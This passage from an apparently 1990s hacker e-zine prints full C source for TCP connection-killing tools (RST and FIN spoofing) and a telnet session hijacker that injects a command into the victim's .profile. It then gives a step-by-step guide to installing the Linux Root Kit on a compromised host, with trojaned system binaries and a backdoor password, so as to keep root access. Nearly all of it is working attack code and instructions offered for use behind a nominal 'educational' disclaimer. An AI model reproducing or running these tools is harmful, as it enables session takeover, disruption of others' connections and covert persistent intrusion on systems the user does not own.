(ntohs(wp_tcphead->offset_flag)&wp_flags) ) { ret_values->seq=ntohl(wp_tcphead->seq_nr); ret_values->ack=ntohl(wp_tcphead->ACK_nr); ret_values->flags=ntohs(wp_tcphead->offset_flag)& (URG|ACK|PSH|FIN|RST|SYN); ret_values->datalen = ntohs(wp_iphead->length) - ((wp_iphead->verlen & 0xF) << 2) - ((ntohs(wp_tcphead->offset_flag) & 0xF000) >> 10); alarm(0); return 0; } } } } } /*impossible to get here.. but anyways*/ alarm(0); return -1; } void close_receiving (void) { close(rc_fd_abc123); } void rc_sigio (int sig) /* Packet handling routine */ { char rc_buffer[1500]; char packet_id [50]; unsigned char *rc_so, *rc_dest; struct IP_header *rc_IPhead; struct TCP_header *rc_TCPhead; int pack_len; if(RC_FILTSET==0) return; if(SP_DATA_BUSY!=0) /* skip this packet */ return; pack_len = read(rc_fd_abc123,rc_buffer,1500); rc_IPhead = (struct IP_header *) (rc_buffer + DEV_PREFIX); if(rc_IPhead->protocol!=6) return; /* if not TCP */ rc_TCPhead = (struct TCP_header *) (rc_buffer + DEV_PREFIX + ((rc_IPhead->verlen & 0xF) << 2)); rc_so = (unsigned char *) &(rc_IPhead->source); rc_dest = (unsigned char *) &(rc_IPhead->destination); sprintf(packet_id,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u", rc_so[0],rc_so[1],rc_so[2],rc_so[3],ntohs(rc_TCPhead->source), rc_dest[0],rc_dest[1],rc_dest[2],rc_dest[3],ntohs(rc_TCPhead->destination)); if(strcmp(packet_id,rc_filter_string)==0) { SP_DATA_BUSY=1; CUR_SEQ = ntohl(rc_TCPhead->seq_nr); CUR_ACK = ntohl(rc_TCPhead->ACK_nr); CUR_FLAGS = ntohs(rc_TCPhead->offset_flag); CUR_DATALEN = ntohs(rc_IPhead->length) - ((rc_IPhead->verlen & 0xF) << 2) - ((ntohs(rc_TCPhead->offset_flag) & 0xF000) >> 10); CUR_COUNT++; SP_DATA_BUSY=0; } } void set_filter (char *f_source, unsigned short f_source_port, char *f_dest, unsigned short f_dest_port) { unsigned char *f_so, *f_des; unsigned long f_sol, f_destl; RC_FILTSET=0; if(DEV_PREFIX==9999) fprintf(stderr,"DEV_PREFIX not set!\n"), exit(1); f_sol = sp_getaddrbyname(f_source); f_destl = sp_getaddrbyname(f_dest); f_so = (unsigned char *) &f_sol; f_des = (unsigned char *) &f_destl; sprintf(rc_filter_string,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u", f_so[0],f_so[1],f_so[2],f_so[3],f_source_port, f_des[0],f_des[1],f_des[2],f_des[3],f_dest_port); RC_FILTSET=1; } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ---=[ sniper-rst.c ]=--------------------------------------------------------- /**************************************************************************/ /* Sniper-rst - Example program on connection killing with IP spoofing */ /* Using the RST flag. */ /* (illustration for 'A short overview of IP spoofing') */ /* */ /* Purpose - Killing any TCP connection on your subnet */ /* */ /* Author - Dr_Sp00f (Himself) */ /* Serious advice, comments, statements, greets, always welcome */ /* flames, moronic 3l33t >/dev/null */ /* */ /* Disclaimer - This program is for educational purposes only. I am in */ /* NO way responsible for what you do with this program, */ /* or any damage you or this program causes. */ /* */ /* For whom - People with a little knowledge of TCP/IP, C source code */ /* and general UNIX. Otherwise, please keep your hands of, */ /* and catch up on those things first. */ /* */ /* Limited to - Linux 1.3.X or higher. */ /* ETHERNET support ("eth0" device) */ /* If you network configuration differs it shouldn't be to */ /* hard to modify yourself. I got it working on PPP too, */ /* but I'm not including extra configuration possibilities */ /* because this would overload this first release that is */ /* only a demonstration of the mechanism. */ /* Anyway if you only have ONE network device (slip, */ /* ppp,... ) after a quick look at this code and spoofit.h */ /* it will only take you a few secs to fix it... */ /* People with a bit of C knowledge and well known with */ /* their OS shouldn't have to much trouble to port the code.*/ /* If you do, I would love to get the results. */ /* */ /* Compiling - gcc -o sniper-rst sniper-rst.c */ /* */ /* Usage - Usage described in the spoofing article that came with this. */ /* If you didn't get this, try to get the full release... */ /* */ /* See also - Sniffit (for getting the necessairy data on a connection) */ /**************************************************************************/ #include "spoofit.h" /* Those 2 'defines' are important for putting the receiving device in */ /* PROMISCUOUS mode */ #define INTERFACE "eth0" #define INTERFACE_PREFIX 14 char SOURCE[100],DEST[100]; int SOURCE_P,DEST_P; void main(int argc, char *argv[]) { int i,stat,j; int fd_send, fd_receive; unsigned long sp_ack, sp_seq; unsigned short flags; struct sp_wait_packet pinfo; if(argc != 5) { printf("usage: %s host1 port1 host2 port2\n",argv[0]); exit(0); } /* preparing some work */ DEV_PREFIX = INTERFACE_PREFIX; strcpy(SOURCE,argv[1]); SOURCE_P=atoi(argv[2]); strcpy(DEST,argv[3]); DEST_P=atoi(argv[4]); /* opening sending and receiving sockets */ fd_send = open_sending(); fd_receive = open_receiving(INTERFACE, IO_NONBLOCK); /* nonblocking IO */ printf("Trying to terminate the connection\n"); for(i=1;i<=100;i++) { /* Waiting for a packet containing an ACK */ stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,5); if(stat==-1) {printf("Connection 5 secs idle or dead...\n");exit(1);} sp_seq=pinfo.ack; sp_ack=0; j=0; /* Sending our fake Packet */ /* for(j=0;j<10;j++) This would be better */ /* { */ transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P, sp_seq+j,sp_ack,RST); /* } */ /* waiting for confirmation */ stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,0,5); if(stat<0) { printf("Connection 5 secs idle or dead...\n"); exit(0); } } printf("I did not succeed in killing it.\n"); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ---=[ sniper-fin.c ]=--------------------------------------------------------- /**************************************************************************/ /* Sniper-fin - Example program on connection killing with IP spoofing */ /* using the FIN flag. */ /* (illustration for 'A short overview of IP spoofing') */ /* */ /* Purpose - Killing any TCP connection on your subnet */ /* */ /* Author - Dr_Sp00f (Himself) */ /* Serious advice, comments, statements, greets, always welcome */ /* flames, moronic 3l33t >/dev/null */ /* */ /* Disclaimer - This program is for educational purposes only. I am in */ /* NO way responsible for what you do with this program, */ /* or any damage you or this program causes. */ /* */ /* For whom - People with a little knowledge of TCP/IP, C source code */ /* and general UNIX. Otherwise, please keep your hands of, */ /* and catch up on those things first. */ /* */ /* Limited to - Linux 1.3.X or higher. */ /* ETHERNET support ("eth0" device) */ /* If you network configuration differs it shouldn't be to */ /* hard to modify yourself. I got it working on PPP too, */ /* but I'm not including extra configuration possibilities */ /* because this would overload this first release that is */ /* only a demonstration of the mechanism. */ /* Anyway if you only have ONE network device (slip, */ /* ppp,... ) after a quick look at this code and spoofit.h */ /* it will only take you a few secs to fix it... */ /* People with a bit of C knowledge and well known with */ /* their OS shouldn't have to much trouble to port the code.*/ /* If you do, I would love to get the results. */ /* */ /* Compiling - gcc -o sniper-fin sniper-fin.c */ /* */ /* Usage - Usage described in the spoofing article that came with this. */ /* If you didn't get this, try to get the full release... */ /* */ /* See also - Sniffit (for getting the necessairy data on a connection) */ /**************************************************************************/ #include "spoofit.h" /* Those 2 'defines' are important for putting the receiving device in */ /* PROMISCUOUS mode */ #define INTERFACE "eth0" #define INTERFACE_PREFIX 14 char SOURCE[100],DEST[100]; int SOURCE_P,DEST_P; void main(int argc, char *argv[]) { int i,stat; int fd_send, fd_receive; unsigned long sp_ack, sp_seq; unsigned short flags; struct sp_wait_packet pinfo; if(argc != 5) { printf("usage: %s host1 port1 host2 port2\n",argv[0]); exit(0); } /* preparing some work */ DEV_PREFIX = INTERFACE_PREFIX; strcpy(SOURCE,argv[1]); SOURCE_P=atoi(argv[2]); strcpy(DEST,argv[3]); DEST_P=atoi(argv[4]); /* opening sending and receiving sockets */ fd_send = open_sending(); fd_receive = open_receiving(INTERFACE, IO_NONBLOCK); /* nonblocking IO */ for(i=1;i<100;i++) { printf("Attack Sequence %d.\n",i); /* Waiting for a packet containing an ACK */ stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10); if(stat==-1) {printf("Connection 10 secs idle... timeout.\n");exit(1);} sp_seq=pinfo.ack; sp_ack=pinfo.seq+pinfo.datalen; /* Sending our fake Packet */ transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,sp_seq,sp_ack,ACK|FIN); /* waiting for confirmation */ stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5); if(stat>=0) { printf("Killed the connection...\n"); exit(0); } printf("Hmmmm.... no response detected... (retry)\n"); } printf("I did not succeed in killing it.\n"); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ---=[ hijack.c ]=------------------------------------------------------------- /**************************************************************************/ /* Hijack - Example program on connection hijacking with IP spoofing */ /* (illustration for 'A short overview of IP spoofing') */ /* */ /* Purpose - taking control of a running telnet session, and executing */ /* our own command in that shell. */ /* */ /* Author - Dr_Sp00f (Himself) */ /* Serious advice, comments, statements, greets, always welcome */ /* flames, moronic 3l33t >/dev/null */ /* */ /* Disclaimer - This program is for educational purposes only. I am in */ /* NO way responsible for what you do with this program, */ /* or any damage you or this program causes. */ /* */ /* For whom - People with a little knowledge of TCP/IP, C source code */ /* and general UNIX. Otherwise, please keep your hands of, */ /* and catch up on those things first. */ /* */ /* Limited to - Linux 1.3.X or higher. */ /* ETHERNET support ("eth0" device) */ /* If you network configuration differs it shouldn't be to */ /* hard to modify yourself. I got it working on PPP too, */ /* but I'm not including extra configuration possibilities */ /* because this would overload this first release that is */ /* only a demonstration of the mechanism. */ /* Anyway if you only have ONE network device (slip, */ /* ppp,... ) after a quick look at this code and spoofit.h */ /* it will only take you a few secs to fix it... */ /* People with a bit of C knowledge and well known with */ /* their OS shouldn't have to much trouble to port the code.*/ /* If you do, I would love to get the results. */ /* */ /* Compiling - gcc -o hijack hijack.c */ /* */ /* Usage - Usage described in the spoofing article that came with this. */ /* If you didn't get this, try to get the full release... */ /* */ /* See also - Sniffit (for getting the necessairy data on a connection) */ /**************************************************************************/ #include "spoofit.h" /* My spoofing include.... read licence on this */ /* Those 2 'defines' are important for putting the receiving device in */ /* PROMISCUOUS mode */ #define INTERFACE "eth0" /* first ethernet device */ #define INTERFACE_PREFIX 14 /* 14 bytes is an ethernet header */ #define PERSONAL_TOUCH 666 int fd_receive, fd_send; char CLIENT[100],SERVER[100]; int CLIENT_P; void main(int argc, char *argv[]) { int i,j,count; struct sp_wait_packet attack_info; unsigned long sp_seq ,sp_ack; unsigned long old_seq ,old_ack; unsigned long serv_seq ,serv_ack; /* This data used to clean up the shell line */ char to_data[]={0x08, 0x08,0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x0a, 0x0a}; char evil_data[]="echo \"echo HACKED\" >>$HOME/.profile\n"; if(argc!=4) { printf("Usage: %s client client_port server\n",argv[0]); exit(1); } strcpy(CLIENT,argv[1]); CLIENT_P=atoi(argv[2]); strcpy(SERVER,argv[3]); /* preparing all necessary sockets (sending + receiving) */ DEV_PREFIX = INTERFACE_PREFIX; fd_send = open_sending(); fd_receive = open_receiving(INTERFACE, 0); /* normal BLOCKING mode */ printf("Starting Hijacking demo - Brecht Claerhout 1996\n"); printf("-----------------------------------------------\n"); for(j=0;j<50;j++) { printf("\nTakeover phase 1: Stealing connection.\n"); wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0); sp_seq=attack_info.seq+attack_info.datalen; sp_ack=attack_info.ack; printf(" Sending Spoofed clean-up data...\n"); transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER,23, sp_seq,sp_ack,ACK|PSH); /* NOTE: always beware you receive y'r OWN spoofed packs! */ /* so handle it if necessary */ count=0; printf(" Waiting for spoof to be confirmed...\n"); while(count<5) { wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==sp_seq+sizeof(to_data)) count=PERSONAL_TOUCH; else count++; }; if(count!=PERSONAL_TOUCH) {printf("Phase 1 unsuccesfully ended.\n");} else {printf("Phase 1 ended.\n"); break;}; }; printf("\nTakeover phase 2: Getting on track with SEQ/ACK's again\n"); count=serv_seq=old_ack=0; while(count<10) { old_seq=serv_seq; old_ack=serv_ack; wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0); if(attack_info.datalen==0) { serv_seq=attack_info.seq+attack_info.datalen; serv_ack=attack_info.ack; if( (old_seq==serv_seq)&&(serv_ack==old_ack) ) count=PERSONAL_TOUCH; else count++; } }; if(count!=PERSONAL_TOUCH) {printf("Phase 2 unsuccesfully ended.\n"); exit(0);} printf(" Server SEQ: %X (hex) ACK: %X (hex)\n",serv_seq,serv_ack); printf("Phase 2 ended.\n"); printf("\nTakeover phase 3: Sending MY data.\n"); printf(" Sending evil data.\n"); transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P, SERVER,23,serv_ack,serv_seq,ACK|PSH); count=0; printf(" Waiting for evil data to be confirmed...\n"); while(count<5) { wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==serv_ack+sizeof(evil_data)) count=PERSONAL_TOUCH; else count++; }; if(count!=PERSONAL_TOUCH) {printf("Phase 3 unsuccesfully ended.\n"); exit(0);} printf("Phase 3 ended.\n"); } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 2. Using LinuxRootKitIII : suid ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Rooting machines is just half the fun, the whole point to owning something is being able to keep root for as long as possible. To do this many kind people have released what are known as root kits. There are currently root kits available for a plethora of operating systems, e.g. Linux, SunOS, and FreeBSD. What a root kit does is installs many backdoored and trojanised programs to replace the existing programs which are used to perform the basic tasks of the host you owned. These tasks include: logging in, listing files, listing proccesses and so on. Focussing on a linux system, mainly because these are the most generally rooted by the masses. There are a few versions of the rootkit around. The main two you should have are LinuxRootKitIII, and LinuxRootKitII. You should have both 2, and 3 because they are for different kinds of linux machine. Generally, LinuxRootKitII (a.k.a lrk2) is for older Linux kernels (in the 1.x range) and LinuxRootKitIII (a.k.a lrk3) is for the newer Linux 2.x kernels. It should be noted somewhere in this article that you need to have owned (rooted) the machine _before_ you try and install rootkit, installing it as a non-root user wont work, and wont help you root the machine at all. Also it should be noted that you shouldn't 'test' lrk2/lrk3 on your own machine as it will probably just fuck you up. Ok, now comes the part I like. To use lrk2 or 3, you need a few things, a Linux box of the correct kernel version, root on that machine, and that machine needs to be able to compile. Once you have that its not a big problem. I'll take you thru it step by step. 1. Upload the lrk of the correct type. Remembering that its lrk2 for 1.x kernels and lrk3 for 2.x kernels. To find out what kernel the remote host is, type "uname -a" at the prompt, the number with the 2 radix points is the kernel version. Example: [root@sploitable root] # uname -a Linux sewid.org 2.0.29 #1 Sat Mar 22 17:39:12 EST 1997 i586 Ex1. This is a linux 2.0.29 kernel machine. Uploading the proper root kit can be easily done by ftp'ing to your remote machine and uploading it that way into some directory on a device with sufficient room to store lrk uncompressed. (Lrk3 is over 3mb uncompressed). To check how much space each device has, type df. 2. Untar/gzip it. This can easily be done by chdir'ing to wherever you uploaded it last step then executing the following command. [root@sploitable root] # tar -zxvf LRKIII.tar.gz 3. Make it. Linux root kits are quite user friendly provided the installation goes according to plan. To make the root kit, chdir to wherever it was untared to (e.g in lrk3, you would type "cd lrk3" from the directory you untarred it from.) and back up your existing binaries. To do this its best to know where they are. Here's a list of the binaries existing location on a common linux system. You should copy all these as shown. /bin/login /usr/bin/passwd /bin/ps /bin/ls /bin/netstat /usr/bin/du /usr/bin/top /usr/bin/rsh /sbin/ifconfig /usr/bin/chsh /usr/bin/chfn /usr/sbin/inetd If one of these files isnt on your system, or not in the directory mentioned above, try to find it using the 'whereis' command. Example: [root@sploitable lrk3] # whereis inetd inetd: /etc/inetd.conf /usr/lbin/inetd /usr/man/man8/inetd.8 Bingo you found inetd hiding in /usr/lbin I suggest copying all these to a directory called bin_bak or something under your lrk dir. Something like "cp /bin/ls ./bin_bak" for all of them is a good start. Ok now you've taken precautions, modify the rootkit.h file that is in the lrk directory. The minimum you should change is the default rootkit password: Example: #define ROOTKIT_PASSWORD "lrkr0x" Change this to... #define ROOTKIT_PASSWORD "code-0" Or anything you want that is *6 CHARACTERS LONG*. Ok thats it. Now your read to compile, this part is taken care of by the make file. All you need to do is type: "make all install" The make file takes all the source, compiles it, and places the new backdoored binaries into all the right places for you. It should be noted that once backdoored you should _NEVER_ attempt to change your rootkit password with the 'passwd' command. The root password is NOT THE SAME AS YOUR ROOTKIT PASSWORD. You may be able to log into the system by typing "root" at the login prompt then some password at the the password prompt, but this is a BACKDOOR, it does not mean the root password is the same as the one you put in rootkit.h. Happy Ownership. suid 1997. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Well, that was issue 1, hope ya'll liked it, don't forget to visit... http://micros0ft.paranoia.com http://www.crackhouse.com http://www.mastaz.org/codezero/ http://ulticonn.dyndns.com/codezero/ And that ends everything, sorry if we spent a little to long straightening some shit out with sIn, but you deserve to know the truth... Until next time, when there will be 950 days until the year 2000... The CodeZero. =============================================================================== ==================> http://el8.netgates.co.uk coming s00n <================== =============================================================================== ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Remember, Mcdonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#* ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ